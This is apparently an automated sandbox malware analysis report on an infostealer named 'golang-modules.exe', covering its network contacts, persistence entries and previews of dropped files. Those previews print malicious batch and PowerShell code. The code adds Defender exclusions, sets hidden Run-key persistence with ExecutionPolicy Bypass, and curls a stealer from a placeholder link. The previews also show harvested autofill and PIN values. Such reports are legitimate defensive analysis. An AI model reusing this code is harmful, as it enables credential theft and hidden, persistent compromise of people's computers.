https://tools.ietf.org/html/rfc3986#section-4.3golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node/pull/30380#issuecomment-552948364golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setintervalgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://heycam.github.io/webidl/#dfn-class-stringgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://heycam.github.io/webidl/#dfn-iterator-prototype-objectgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
162.159.136.232
ptb.discord.comUnited States
13335CLOUDFLARENETUSfalse
49.13.193.134
api.filedoge.comGermany
24940HETZNER-ASDEfalse
104.26.13.205
api.ipify.orgUnited States
13335CLOUDFLARENETUSfalse
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1471277
Start date and time:2024-07-11 08:31:06 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 14m 1s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:Suspected VM Detection
Number of analysed new started processes analysed:90
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:golang-modules.exe
Detection:MAL
Classification:mal100.spyw.expl.evad.winEXE@767/113@3/3
EGA Information:
  • Successful, ratio: 50%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 13
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
  • Execution Graph export aborted for target powershell.exe, PID 8336 because it is empty
  • Execution Graph export aborted for target powershell.exe, PID 8784 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtOpenKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.
TimeTypeDescription
02:33:19API Interceptor145x Sleep call for process: powershell.exe modified
02:33:30API Interceptor14x Sleep call for process: WMIC.exe modified
08:33:32Task SchedulerRun new task: GoogleUpdateTaskMachineUAC path: cscript s>//nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs
08:33:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Powershell "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CzwstUXyiQEbaNB.ps1"
08:33:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\Desktop\golang-modules.exe
08:33:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Powershell "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\BRlYwTkpDLdqezC.ps1"
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
162.159.136.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
  • discord.com/administrator/index.php
49.13.193.134SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
    SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
      stub.exeGet hashmaliciousUnknownBrowse
        stub.exeGet hashmaliciousUnknownBrowse
          104.26.13.205SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          242764.exeGet hashmaliciousFicker Stealer, Rusty StealerBrowse
          • api.ipify.org/?format=wef
          Ransom.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
          • api.ipify.org/
          ld.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
          • api.ipify.org/
          ReturnLegend.exeGet hashmaliciousStealitBrowse
          • api.ipify.org/?format=json
          SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
          • api.ipify.org/
          Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
          • api.ipify.org/?format=json
          ArenaWarSetup.exeGet hashmaliciousStealitBrowse
          • api.ipify.org/?format=json
          Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/?format=json
          E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ptb.discord.comSetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
          • 162.159.128.233
          SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
          • 162.159.128.233
          KzqQe0QtRd.exeGet hashmaliciousUnknownBrowse
          • 162.159.137.232
          PAP46E1UkZ.exeGet hashmaliciousUnknownBrowse
          • 162.159.128.233
          A4AxThCBqS.exeGet hashmaliciousNanocore, Luna Logger, Umbral StealerBrowse
          • 162.159.136.232
          SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exeGet hashmaliciousCKS Stealer, Spark RATBrowse
          • 162.159.137.232
          SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exeGet hashmaliciousCKS Stealer, Spark RATBrowse
          • 162.159.138.232
          Lunar_Builder.exeGet hashmaliciousItroublveBOT StealerBrowse
          • 162.159.138.232
          v5u7AiCLzw.exeGet hashmaliciousNitroRansomwareBrowse
          • 162.159.138.232
          api.filedoge.comSecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
          • 49.13.193.134
          SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
          • 49.13.193.134
          stub.exeGet hashmaliciousUnknownBrowse
          • 49.13.193.134
          stub.exeGet hashmaliciousUnknownBrowse
          • 49.13.193.134
          api.ipify.orghttps://www.canva.com/design/DAGKjIaIIOg/dnxUW38JksDdsGh-XKZQbw/edit?utm_content=DAGKjIaIIOg&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
          • 172.67.74.152
          MV ALEXOS_VESSEL'S DESC.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
          • 172.67.74.152
          file.exeGet hashmaliciousAgentTeslaBrowse
          • 172.67.74.152
          HSBC Bank_Approvel Letter.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 104.26.12.205
          Packing list PL#9589-SL2024-03.exeGet hashmaliciousAgentTeslaBrowse
          • 172.67.74.152
          https://altus.force.com/resolutionGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          https://faragozin.com/Get hashmaliciousHTMLPhisherBrowse
          • 104.26.13.205
          https://www.canva.com/link?target=https%3A%2F%2Fhua.n8xgn.com%2FhUA%2F&design=DAGKdwTkY28&accessRole=viewer&linkSource=documentGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          invoices Focuson - 1342-000-0062.exeGet hashmaliciousAgentTeslaBrowse
          • 172.67.74.152
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CLOUDFLARENETUS502407267 RUAG FOODPLAZA.exeGet hashmaliciousDarkTortilla, FormBookBrowse
          • 104.21.79.62
          http://www.ashlardev.comGet hashmaliciousUnknownBrowse
          • 1.1.1.1
          https://neg.b09cla.com/NEg/Get hashmaliciousUnknownBrowse
          • 104.21.15.49
          Innocap-Settlement.pdfGet hashmaliciousHTMLPhisherBrowse
          • 104.21.44.195
          https://myworkspacee725d.myclickfunnels.com/document11--b3091Get hashmaliciousUnknownBrowse
          • 104.17.25.14
          Document.exeGet hashmaliciousFormBookBrowse
          • 188.114.97.3
          COMPROVANTE DE PAGAMENTO.ppamGet hashmaliciousRevengeRATBrowse
          • 172.67.19.24
          https://bvapllc.freshdesk.com/en/support/solutions/articles/154000165865-secure-business-documentsGet hashmaliciousHTMLPhisherBrowse
          • 104.21.11.125
          Purchase Order.exeGet hashmaliciousLokibotBrowse
          • 188.114.96.3
          HETZNER-ASDEStartGame.exeGet hashmaliciousRedLineBrowse
          • 95.217.197.197
          file.exeGet hashmaliciousVidarBrowse
          • 95.217.27.167
          file.exeGet hashmaliciousVidarBrowse
          • 95.217.27.167
          file.exeGet hashmaliciousVidarBrowse
          • 195.201.89.97
          94.156.66.188-sora.mpsl-2024-07-10T02_33_28.elfGet hashmaliciousMiraiBrowse
          • 138.201.252.85
          file.exeGet hashmaliciousVidarBrowse
          • 95.217.27.167
          file.exeGet hashmaliciousVidarBrowse
          • 95.217.27.167
          phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
          • 46.4.15.55
          SecuriteInfo.com.Trojan.Siggen18.23618.24708.4475.exeGet hashmaliciousAESCRYPT RansomwareBrowse
          • 116.202.120.165
          CLOUDFLARENETUS502407267 RUAG FOODPLAZA.exeGet hashmaliciousDarkTortilla, FormBookBrowse
          • 104.21.79.62
          http://www.ashlardev.comGet hashmaliciousUnknownBrowse
          • 1.1.1.1
          https://neg.b09cla.com/NEg/Get hashmaliciousUnknownBrowse
          • 104.21.15.49
          Innocap-Settlement.pdfGet hashmaliciousHTMLPhisherBrowse
          • 104.21.44.195
          https://myworkspacee725d.myclickfunnels.com/document11--b3091Get hashmaliciousUnknownBrowse
          • 104.17.25.14
          Document.exeGet hashmaliciousFormBookBrowse
          • 188.114.97.3
          COMPROVANTE DE PAGAMENTO.ppamGet hashmaliciousRevengeRATBrowse
          • 172.67.19.24
          https://bvapllc.freshdesk.com/en/support/solutions/articles/154000165865-secure-business-documentsGet hashmaliciousHTMLPhisherBrowse
          • 104.21.11.125
          Purchase Order.exeGet hashmaliciousLokibotBrowse
          • 188.114.96.3
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          3b5074b1b5d032e5620f69f9f700ff0eDocument.exeGet hashmaliciousFormBookBrowse
          • 49.13.193.134
          2024.0198840 298135.msiGet hashmaliciousUnknownBrowse
          • 49.13.193.134
          yM80f3LuOQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
          • 49.13.193.134
          https://dgfuyh.weebly.com/Get hashmaliciousUnknownBrowse
          • 49.13.193.134
          http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
          • 49.13.193.134
          https://dharaprajapati2.github.io/Netflix-cloneGet hashmaliciousUnknownBrowse
          • 49.13.193.134
          http://tinyurl.com/37xr9ez4Get hashmaliciousUnknownBrowse
          • 49.13.193.134
          http://sign-in-att-107403.weeblysite.com/Get hashmaliciousUnknownBrowse
          • 49.13.193.134
          http://aks34.github.io/NETFLIX_CLONE/Get hashmaliciousUnknownBrowse
          • 49.13.193.134
          http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfyGet hashmaliciousUnknownBrowse
          • 49.13.193.134
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeSecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
            SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
              stub.exeGet hashmaliciousUnknownBrowse
                stub.exeGet hashmaliciousUnknownBrowse
                  GunManiaSetup(4).exeGet hashmaliciousUnknownBrowse
                    GunManiaSetup(4).exeGet hashmaliciousUnknownBrowse
                      C:\Users\user\AppData\Local\Temp\pkg-d2MzMX\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
                          stub.exeGet hashmaliciousUnknownBrowse
                            stub.exeGet hashmaliciousUnknownBrowse
                              GunManiaSetup(4).exeGet hashmaliciousUnknownBrowse
                                GunManiaSetup(4).exeGet hashmaliciousUnknownBrowse
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                  Category:dropped
                                  Size (bytes):2703
                                  Entropy (8bit):6.711932328807776
                                  Encrypted:false
                                  SSDEEP:48:9J6Tagn+/4V3eImjgMhUG8gGrJ5L4mZn0kx3FbmV:Z2tVuUtgGrJTtFSV
                                  MD5:CFDF23B2149CC352E8D68D0768D4C825
                                  SHA1:A64ABB1CC609198E974C2C601A3822518A697398
                                  SHA-256:1D00000FE0BDCA648B99A0DF7EF736A60793B15E2D1D942299FA33DCDE4A3B06
                                  SHA-512:10010F628A8E2541BD6A546427AEF0303F026C066C75707C876DDE69E42E5E7FED6ADACC3DFA3AE8CC8D0355FEB8D57C0462D0CA9EFB2D9857AA4824643496F6
                                  Malicious:false
                                  Preview:PK......../..X................Autofills\PK......../..X....}...........Autofills\Autofills.txt....v./...I1466.......E.\~...V...y!..%.\a.9.@~.Irn!.cAANfrbIf~...{~~zN..KjZbiN....`.....$S`.1...r.J..2....^.E.A.0.........PK......../..X................Cards\PK......../..X.,x.&...$.......Cards\Cards.txt....v./...I1466.........WHN,J)VH./.K..PK......../..X...8............debug.log.U.n.F.}.........E.h.....M.@.k.a ..!......#._.."....@. ..=g..p...^.y.."..Q<...p.'x..2.8.G..|9.}....W8.Fa....).E..(..*.Q...A.=.......=.3.>.0%B.Va.%.).q0!.|g......x..%...HQk.bJ`....$..7..K....<$.y.j.].[R.aQr...T ./....d...D+.!..B..A...0..).!...B.d..ai..J..>.Z.}0.`........."3|G..4..<...9...X.Z..M?~..b..y...=..Wm.O..t5"..4:....^.R..kx.V./M].L.....eY..4w....b..^)c...8.E....."&3@.db.+.Ng...H..N..+8...F..3e.V%gMs..K>.U.>..G...u...F........\S..p|..z?.....j3.VR.2.5.;.Y...\X....~c....F...e......5..&Y.....2|pl.p........G..i<..A6....B.R..q..x08....k}&...>.rA.+X.........[t......y|.K|0....t,.=N)..
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):387
                                  Entropy (8bit):4.534707892015009
                                  Encrypted:false
                                  SSDEEP:6:R8jWhrcJVfdcLaAL2xrVAfbocLaAL21facLaAL23c1UMGcLaAL2OkM0BHcLaAV:ReSLorVARLKLgMbL/w8LJ
                                  MD5:A13E8620BB9B839F549F2A228A373D60
                                  SHA1:06CAFF9AD7CC34A863C62F6F1FD178C4F54084B3
                                  SHA-256:4DDAD44A893850BA13346A1EF0FCE344779017F25EC769EF0D4752596A57744E
                                  SHA-512:19788D20ECDE76101E7CE9561F8047F7EAB83EC01EDA6BFD077292E0810F7CAEDBD3AAEE29E5B7B2A1238EA8453FF11904B5D5A54A635248265D2AE926DD1F86
                                  Malicious:true
                                  Preview:<==[Covllld1337]>==>..================.Name: PinText1.Value: r4cmq.Application: Google Default.================.Name: PinText2.Value: t76tc.Application: Google Default.================.Name: PinText3.Value: ymw2y.Application: Google Default.================.Name: PinText4.Value: yhgxj.Application: Google Default.================.Name: PinText5.Value: 7fvrz.Application: Google Default.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):36
                                  Entropy (8bit):4.273684376262023
                                  Encrypted:false
                                  SSDEEP:3:v+mwJcSWR3LKVRCln:R8jWhL6cn
                                  MD5:76D24EB2886F61672ED4D463D4DD2883
                                  SHA1:89821BC6E0C8C8FF193BCF3E7B4ADD33B97B1C2F
                                  SHA-256:B0EE262BD44571126E55C3A76E01E4868F552D30B7EFBDAEBDD5273EAD0102E8
                                  SHA-512:732E506C54ECFD4E6A96709DD1F0852F349BEC45D40B9286E9FC78365E0C43A3D2B0E17DBA9337E712154D18F215ED1B6B69C159D27BDAA6D7D1E0D24F1B4FDD
                                  Malicious:true
                                  Preview:<==[Covllld1337]>==>..no cards found
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):15
                                  Entropy (8bit):3.323231428797621
                                  Encrypted:false
                                  SSDEEP:3:a2KeBLn:fBLn
                                  MD5:675951F6D9D75FD2C9C06B5FF547C6FD
                                  SHA1:9B474AB39D1E2AAD52EA5272DBAC7D4F9FE44C09
                                  SHA-256:60FE7843B40ED5B7C68118BBBA6BFE5F786A76397CDEDB80612FD7CEFCE7F244
                                  SHA-512:44DFB6C937283870C6EEDF724649004A82631CD8EEB3F9C83E5BCA619D1C9FFB8AA5F51C91D57F76789E2747712CE9C6AD207773928E5E00E712F640F8C25AEA
                                  Malicious:false
                                  Preview:No token found.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):44
                                  Entropy (8bit):4.297626721392666
                                  Encrypted:false
                                  SSDEEP:3:v+mwJcSWR3LKcWWSKXB5LQ:R8jWhLpSKXvLQ
                                  MD5:8ADB3A7C3F9FE02B2BDE311D025BDD88
                                  SHA1:17972625FDA9AFE298C4759EDEB82F92DE570E0E
                                  SHA-256:DC8F74E68CA489B82FD59D5E4C82C02835B2156D4CAE3B67DB11AA354812FA42
                                  SHA-512:A6D9815006134D9A951AE7004582330AF8B44ED2FD7B1528F74CCEAA7F8233D8B791BF0F09836239F3C1275F2952749186ED4594DDB51A8E475D27A4BF805180
                                  Malicious:true
                                  Preview:<==[Covllld1337]>==>..no password found for
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):1278682
                                  Entropy (8bit):7.953773994841384
                                  Encrypted:false
                                  SSDEEP:24576:JvU9YEn843HTNwMbSVbJ818+SU7i2/qooEM8Gz4i+3ywSF0bvSm9:JvEr3zNeGehU7iiqXE+EiwSF4
                                  MD5:47F77E3879272ABBEDEB3289BFDB9EE4
                                  SHA1:7B803F26AFFECD934853D261BB0A49F45CEB20D3
                                  SHA-256:7586E38EB75FD082D5930889749D8840AE109367EE57CDD95789686CC6FA5324
                                  SHA-512:5CD5FF007D7BB3FBBC53C1B2CCA7523E28D3F0E34506E629739EE65AD64C730AF99EFD288A5761561C0657B0DAED4A59EAC342D5AFE8EED8C63C36C25043C0CB
                                  Malicious:false
                                  Preview:.PNG........IHDR.......8........C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....U.....ON`.c.....;z.......s...1V...e.2t.....b.U]. ..s.EQ.(."...>s.g.w..]k.uv8..1.1.|.;.7...p..s..u:.<...>:.S....<{...L|v.i^..2..4.S...8.>..>9.%..U............Y..'...=.,9..f...'......'.3D...h:'=4...L...)..C...K...C.g...?.8...dk..{...Sh.i./4.O.?+&>.............;.G:..o(...L~t:....y..w?.S&.w9..:..yC..H9.l.P.c..|.....&..'....I....k3...1...1....y.]i<2j..g.~<K~8+&.....y..+1...?....}g.....3d.g.._.s'L.`./.7.qr3&...........[.3....[...K.<...o.v..o..c.....HY..oMa...1.o.%.6...z....`......Lg...g.ko....|.m.q........y.-....V..U.l...<..%.....B.1w..Lc..+...T.K....|./+.Rb%..c....J;w..J;.%/..Yvl9..7TV..|....}....17.9Z..: .x...#.oV.{k....nhV..q..k..G..=.k........e%...O!.....V...f.Kom..v]...k.UG.T.Ol.1..{.M..cn...#.y.......*..^S..Y>.!W.y.*..q..y./?..f..5+.w...].L.|E..|w...K..e._.,9..f.+....i..R....j&^rem..:.<......7...hV.V.Q....(yK.:X.....n..Gi..9.W.~
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text, with CR, LF line terminators
                                  Category:dropped
                                  Size (bytes):683
                                  Entropy (8bit):4.877266888124492
                                  Encrypted:false
                                  SSDEEP:12:ReFMNrET7xG9E7BU4W+efyKeWbT5EwZ72GG9E7NXWa6mEh6M2qx:ReFMx672GBhWtyKe2T5Ea2/GxWa6mA
                                  MD5:D5B06B0FA841C9612B81407B1BF891AF
                                  SHA1:978DF51052136BF1094728449BD4451B85556E24
                                  SHA-256:9C9780F2EC497BE8F82E0BDA31790A6FF23FE0E3FFC509AAD9388847D951FA44
                                  SHA-512:3DCB7C36CA5FB82F40225583F6CB3D89450B3A3BBFF7B800263456111F8D0BFDE567226B009D6B587C16744B71D606EDAC22215C5F38D755DF7B7B56619A45FD
                                  Malicious:false
                                  Preview:<==[Covllld1337]>==>..======= Disk =======.SerialNumber .. G515600503 .. .. ======= Motherboard =======.SerialNumber .. 197668560000595 .. .. ======= SMBios =======.UUID .. 00000000-0000-0000-0000-D05099DB2397 .. .. ======= GPU =======.Description PNPDeviceID .. Intel(R) UHD Graphics 630 PCI\VEN_8086&DEV_3E98&SUBSYS_3E981849&REV_02\3&11583659&0&10 .. .. ======= RAM =======.SerialNumber .. 404D67B7 .. 404D5A67 .. .. ======= Bios =======.UUID .. 00000000-0000-0000-0000-D05099DB2397 .. .. ======= CPU =======.ProcessorId .. BFEBFBFF000906ED .. .. ======= Mac =======.. D0-50-99-DB-23-98 \Device\Tcpip_{68C65ED0-D5FC-471F-BF0F-95C04D2E3B08} . D0-50-99-DB-23-97 Media disconnected .
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text, with very long lines (454), with CRLF, LF line terminators
                                  Category:dropped
                                  Size (bytes):2968
                                  Entropy (8bit):5.197577799045285
                                  Encrypted:false
                                  SSDEEP:48:ZpdB9EJmQTOwLKCFOz5b57RGKYKGuLRstwn+y0EJXCkuJaVVEJmQT+:ZXEJm4Oz5b5lVGuaLYuiVEJmp
                                  MD5:D659F658E1327C17D5AD494AED34E777
                                  SHA1:8149BC15EA8959534C03EEFAB9B9A5F6FDF162CB
                                  SHA-256:2BC694AEC9DF6E0755DAD557688053C8756E5E64AF121A2DA55CD4F3C16A8753
                                  SHA-512:FD735E8855A1D09FACB4C045A784188D70AD99BDD8D74C113DDA997F5E6CBA3B045F10744A22B5B9F0EA36D49DD9612BF74C957212B8CB222B002E5001D0AE1C
                                  Malicious:false
                                  Preview:2024-07-11T06:33:30.621Z - (node:7476) [DEP0018] DeprecationWarning: Unhandled promise rejections are deprecated. In the future, promise rejections that are not handled will terminate the Node.js process with a non-zero exit code..2024-07-11T06:33:30.621Z - (node:7476) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). To terminate the node process on unhandled promise rejection, use the CLI flag `--unhandled-rejections=strict` (see https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode). (rejection id: 2).2024-07-11T06:33:30.620Z - (node:7476) UnhandledPromiseRejectionWarning: Error: ENOENT: no such file or directory, scandir 'C:\Users\user\AppData\Local\exodus'. at Object.readdirSync (fs.js:1048:3). at Object.readdirSync (pkg/prelude/bootstrap.js:1306:35). at injectExodus (eval at <anonymous> (C:\snaps
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:Zip archive data (empty)
                                  Category:dropped
                                  Size (bytes):22
                                  Entropy (8bit):1.0476747992754052
                                  Encrypted:false
                                  SSDEEP:3:pjt/l:Nt
                                  MD5:76CDB2BAD9582D23C1F6F4D868218D6C
                                  SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
                                  SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
                                  SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
                                  Malicious:false
                                  Preview:PK....................
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:DOS batch file, ASCII text
                                  Category:dropped
                                  Size (bytes):1384
                                  Entropy (8bit):5.068460684554892
                                  Encrypted:false
                                  SSDEEP:24:XkuwLuVMMkuwLuVwVmjQI2D33thbVhM637vIPyUauVMnp7nuVMuluVMBo2:Xk/Lubk/LuaYUz33/o6MLaukZudluJ2
                                  MD5:AEDD67BF1D3171F1E3D205A1BE83D565
                                  SHA1:72E9F8370AFB32BE73E2E86753A197EB6D4E5E28
                                  SHA-256:C89374447E9B3DEFF349B763911AA15912C6BD7E1FCC27C56D4BE1A11ABFCF71
                                  SHA-512:DB62A94F697A7304408A84384FB13246359D81A01397D7B56ED508E96A7B452B76FF263C04697077E98CA2CC66F5B40237A20C61CB242C27B4A0F72062E494D8
                                  Malicious:true
                                  Preview:@echo off..powershell Add-MpPreference -ExclusionPath "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup".powershell Add-MpPreference -ExclusionPath "%APPDATA%\Microsoft\Windows".REM Add registry key.reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\user\Desktop\golang-modules.exe" /f..REM Display registry value.reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"..REM Verify if App1 is already installed.if not exist "C:\Users\user\Desktop\golang-modules.exe" (. REM Download and install App1. curl -o "C:\Users\user\Desktop\golang-modules.exe" YOUR-STEALER-EXE-LINK-HERE. if not exist "C:\Users\user\Desktop\golang-modules.exe" (. echo Error downloading App1.. ) else (. echo App1 installed successfully.. ).) else (. echo App1 is already installed..).REM Verify if App2 is already installed.if not exist "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" (.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):3255
                                  Entropy (8bit):5.544772037808569
                                  Encrypted:false
                                  SSDEEP:96:veVLrjvVBPf+mRcimSumz4mgHmnFIm9oSmME7LmDSbHgmwwY6W:mVlMFHmSyXTEHVbAHwlW
                                  MD5:A8834C224450D76421D8E4A34B08691F
                                  SHA1:73ED4011BC60BA616B7B81FF9C9CAD82FB517C68
                                  SHA-256:817C184E6A3E7D1FF60B33EC777E23E8E0697E84EFDE8E422833F05584E00EA5
                                  SHA-512:672B3ECA54DFF4316DB904D16C2333247E816E0CD8EF2D866111DDB49AB491568CC12D7263891707403DD14962326404C13855D5DE1AE148114A51CB7D5E5596
                                  Malicious:true
                                  Preview:.$sctpth = $MyInvocation.MyCommand.Path.$ran = -join ((65..90) + (97..122) | Get-Random -Count 15 | ForEach-Object {[char]$_}).$ranpth = if ((Get-Random) % 2) { Join-Path $env:TEMP "$ran.ps1" } else { Join-Path $env:APPDATA "$ran.ps1" }.Copy-Item -Path $sctpth -Destination $ranpth -Force.Remove-Item -Path $sctpth -Force..$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run".$valn = "Powershell".$val = """powershell.exe"" -WindowStyle Hidden -ExecutionPolicy Bypass -File ""$ranpth"""..if (!(Test-Path $key)) {. New-Item -Path $key -Force | Out-Null.}..Set-ItemProperty -Path $key -Name $valn -Value $val..Add-Type -Name Window -Namespace Console -MemberDefinition '.[DllImport("Kernel32.dll")].public static extern IntPtr GetConsoleWindow();.[DllImport("user32.dll")].public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);.public static void Hide().{. IntPtr hWnd = GetConsoleWindow();. if(hWnd != IntPtr.Zero). {. ShowWindow(hWnd, 0);. }.}.'.[Console.Windo
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):146
                                  Entropy (8bit):4.928685947046963
                                  Encrypted:false
                                  SSDEEP:3:j+qAHmFEm8nmJNoDQB8XZkREeltLMGn0P2jLAtzqAHmOUC:j+q9NqcN78G1lt4J1qGUC
                                  MD5:14A9867EC0265EBF974E440FCD67D837
